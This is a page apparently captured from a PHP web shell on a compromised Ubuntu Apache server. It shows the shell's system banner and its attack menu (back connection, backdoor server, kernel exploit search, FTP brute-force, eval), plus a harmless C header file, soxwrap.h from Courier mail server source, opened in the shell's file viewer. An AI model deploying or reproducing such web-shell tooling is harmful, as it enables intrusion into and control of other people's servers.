|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 24.33 GB of 70.42 GB (34.56%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
usr/
src/
courier-0.66.1/
soxwrap/
- drwxrwxrwx
|
Viewing file: soxwrap.h (1.45 KB) -rw-rw-rw-Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
#ifndef soxwrap_h #define soxwrap_h
/* ** Copyright 2000 Double Precision, Inc. ** See COPYING for distribution information. */
#ifdef __cplusplus extern "C" { #endif
#include "soxwrap/soxwrap_config.h"
#include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #if HAVE_SYS_SELECT_H #include <sys/select.h> #endif #if HAVE_SYS_POLL_H #include <sys/poll.h> #endif #include <netinet/in.h> #include <arpa/inet.h> #include <fcntl.h> #include <netdb.h> #include <unistd.h>
#define sox_init(s) 0 #define sox_socket socket
#if HAVE_SOCKS
#include <socks.h>
#define sox_getpeername Rgetpeername #define sox_getsockname Rgetsockname #define sox_accept Raccept #define sox_connect Rconnect #define sox_bind Rbind #define sox_listen Rlisten #define sox_recvfrom Rrecvfrom #define sox_sendto Rsendto #define sox_read Rread #define sox_write Rwrite #define sox_close Rclose #define sox_dup Rdup #define sox_dup2 Rdup2 #define sox_select Rselect #define sox_poll Rpoll #define sox_getsockopt Rgetsockopt
#else
#define sox_getpeername getpeername #define sox_getsockname getsockname #define sox_accept accept #define sox_connect connect #define sox_bind bind #define sox_listen listen #define sox_recvfrom recvfrom #define sox_sendto sendto #define sox_read read #define sox_write write #define sox_close close #define sox_dup dup #define sox_dup2 dup2 #define sox_select select #define sox_poll poll #define sox_getsockopt getsockopt #endif
#ifdef __cplusplus } #endif
#endif
|